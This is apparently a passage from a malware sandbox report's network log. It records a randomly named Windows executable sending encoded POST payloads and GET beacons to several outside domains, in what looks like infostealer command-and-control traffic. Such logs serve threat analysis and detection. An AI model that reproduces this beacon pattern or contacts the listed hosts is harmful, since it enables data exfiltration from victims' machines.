Nov 25, 2024 09:44:42.262790918 CET | 515 | OUT | GET /zoqm/?qX=qP0hoZO0bjg4&ifzt=Qq0FFa8OkDRPhmjT0VM8NDOXfTRiFF6zBHj2iH9IdxJy16x8x8AWanWvy54Dx3T7LlN6VBvxFf1wAvhvFTk518nT82cv2sbx2pE2mKVvPmrAc0IY36SOsAA= HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.327531.buzz
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:44:43.814791918 CET | 729 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:43 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 50015 | 209.74.77.108 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:44:49.380299091 CET | 804 | OUT | POST /aezw/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.urbanfashion.website
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.urbanfashion.website
                                                                                                                                                Referer: http://www.urbanfashion.website/aezw/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=aP02Xw7xUTLxopgXgUiA2hc0ly4IYo8o61W6ERSiEBK2LjcFEDk9qvEftdbB2SMNTKLuwuWDw6jJUCs7wh6gpA7tDbe+t4WsJSGjg7DQk2sY//q73N4fHm5P/wZPw0VpNVntksJXu4lI7ZsjMijexdYyCISyFeaDnY1VZY0JCX2JRvJMqMY8yYX2s5GmDgvpHg==
Nov 25, 2024 09:44:50.674333096 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:50 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Length: 389
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 50022 | 209.74.77.108 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:44:52.039508104 CET | 824 | OUT | POST /aezw/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.urbanfashion.website
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.urbanfashion.website
                                                                                                                                                Referer: http://www.urbanfashion.website/aezw/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=aP02Xw7xUTLxqMwXsX6A+hc37C4ISI8s61q6EQn5Eyi2KG4FCyk9tvEfm9bAoiMwTK2ZwvqDw63JUDc7sGOvrQ7vYre8p4WsJSGjg7+Yk20Y/Oa70s4cNG5I2QZPjkUBNVnLku95u7NI7Y8jNzjRi9YOMoT+Orj8nIw5ZrMlcF+odJEW795rgYzFx+PSOjSgcvon2uZ3RH2+QPUbdvxL9B8=
Nov 25, 2024 09:44:53.337768078 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:53 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Length: 389
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 50030 | 209.74.77.108 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:44:54.698921919 CET | 10906 | OUT | POST /aezw/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.urbanfashion.website
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.urbanfashion.website
                                                                                                                                                Referer: http://www.urbanfashion.website/aezw/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:44:56.021486998 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:55 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Length: 389
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 50035 | 209.74.77.108 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:44:57.363040924 CET | 524 | OUT | GET /aezw/?ifzt=XNcWUHXsHCrFsIBQlHGgjiME8CQZSYUU21qPNzqhKy2oFU8Odgs/t8kovejF8iENVZDP/oOK84yuTx8YyXOBoi/XK/eRsY6lCiyQls/Pp30YwPjl0cgXKAM=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.urbanfashion.website
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:44:58.679361105 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:58 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Length: 389
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 50044 | 185.27.134.206 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:45:04.581717968 CET | 804 | OUT | POST /vvzz/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                Referer: http://www.canadavinreport.site/vvzz/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=RWwzoRn7XpoFGdXkF6no5Rf/cVMEQnwh/Nz7noDC/zeUlcQRsyGHGpr4mYdm+O3VdcrzasrYT/uUv9p5pRlcm+Mi/hVoUACWyx+be2W3Cx0rRADDvJdTHbeX5/oZJDpF6aV2fVx0JTORXh680KugkY2UlRLAMxdmpGsgfzdTdsOhNjL10vkVGfZFQASdBP5qlA==
Nov 25, 2024 09:45:05.813123941 CET | 683 | IN | HTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:05 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 50045 | 185.27.134.206 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:45:07.243805885 CET | 824 | OUT | POST /vvzz/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                Referer: http://www.canadavinreport.site/vvzz/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=RWwzoRn7XpoFE+PkGd7o+xf+ZVMEeHwl/N/7nqvS/A6Ul4UR22aHFpr4yocuje2bdc3BavzYT+KUv8Z5uglbnuM83BVuQACWyx+be2CNCx8rRzLDushcN7eQtvoZezpJ6aVIfXIRJRGRXgq81buvtY2WhRKWJy8So2FRAAJqdsanIlGvleFCUf92NHbpMMEj+ESAOiqhS+Mk6PiAWS8D2MA=
Nov 25, 2024 09:45:08.524236917 CET | 683 | IN | HTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:08 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 50046 | 185.27.134.206 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:45:09.914906979 CET | 10906 | OUT | POST /vvzz/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.canadavinreport.site
                                                                                                                                                Referer: http://www.canadavinreport.site/vvzz/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Data Ascii: ifzt= [TRUNCATED]
Nov 25, 2024 09:45:11.241317987 CET | 683 | IN | HTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:11 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 50047 | 185.27.134.206 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:45:12.568989038 CET | 524 | OUT | GET /vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzB+Eo/kiz1zVNsrH4IZXq93JBsPKcKHGWPOW5+N9njVZg9AZ40ltQReYzymzYn/PGSkLTDv/+fBeI5c=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.canadavinreport.site
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:45:13.851711988 CET | 1183 | IN | HTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:13 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 982
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("06dcab5f8942e5ac4ac00564a9fea9bf");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzB+Eo/kiz1zVNsrH4IZXq93JBsPKcKHGWPOW5+N9njVZg9AZ40ltQReYzymzYn/PGSkLTDv/+fBeI5c=&qX=qP0hoZO0bjg4&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 50048 | 163.44.185.183 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:45:20.884491920 CET | 801 | OUT | POST /9k5s/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.sankan-fukushi.info
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.sankan-fukushi.info
                                                                                                                                                Referer: http://www.sankan-fukushi.info/9k5s/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=GJVByEqlZX0/VUyMndy3gaEMVNiN1z15zivJfWiLmfePVsXHcwDdDPCfMA9oTG8ti6Ij1htyNEeQjnr1kS1nE1jEpXhm9IHHhKuSriGp3TZAWKb7/B1Zxl9ZPpm5dN2JFcwD8AdvulVR0td5dJqUBZnJLG1aDPqaCTBnR41GtOIY618nIMzoInGzVnA/bVbaBw==
Nov 25, 2024 09:45:22.341161966 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:22 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 19268
                                                                                                                                                Connection: close
                                                                                                                                                Server: Apache
                                                                                                                                                Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 50049 | 163.44.185.183 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:45:23.555538893 CET | 821 | OUT | POST /9k5s/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.sankan-fukushi.info
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.sankan-fukushi.info
                                                                                                                                                Referer: http://www.sankan-fukushi.info/9k5s/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=GJVByEqlZX0/U1CMoea3xKELZtiN7T19zijJfVublq2PVNnHOBDdQ/CfVw9tM28mi9BW1gByNHiQjjv1khdmFljKynh45IHHhKuSriCD3X1AW/L7+g1euV9Wepm5ZN2NFcx58BQ0undR0o55cYqXapnPFm1RScLlYwwXbZdmiPMHyTx9Z9S/aniAIgJLWWmTaweLe/uCGRgAy4Y65eyiYAc=
Nov 25, 2024 09:45:24.967727900 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:24 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 19268
                                                                                                                                                Connection: close
                                                                                                                                                Server: Apache
                                                                                                                                                Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 50050 | 163.44.185.183 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:45:26.212435961 CET | 10903 | OUT | POST /9k5s/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.sankan-fukushi.info
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.sankan-fukushi.info
                                                                                                                                                Referer: http://www.sankan-fukushi.info/9k5s/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 50051 | 163.44.185.183 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:45:28.870351076 CET | 523 | OUT | GET /9k5s/?ifzt=LL9hxxOEAXNrd1/9gf6rhKwJTveb5Fl2+AbaSF/ioM6ycsHwCgOlWdWUKzBQGlsNiYd2kWB7LHmLrDvgpCIhDnf37DhA8cnF96i4zyTZqkB+X7XYpxBXm1Q=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.sankan-fukushi.info
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:45:30.299025059 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:30 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 19268
                                                                                                                                                Connection: close
                                                                                                                                                Server: Apache
                                                                                                                                                Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 50052 | 217.160.0.200 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:45:36.356439114 CET | 786 | OUT | POST /lnel/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                Referer: http://www.carsten.studio/lnel/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:45:37.664650917 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:37 GMT
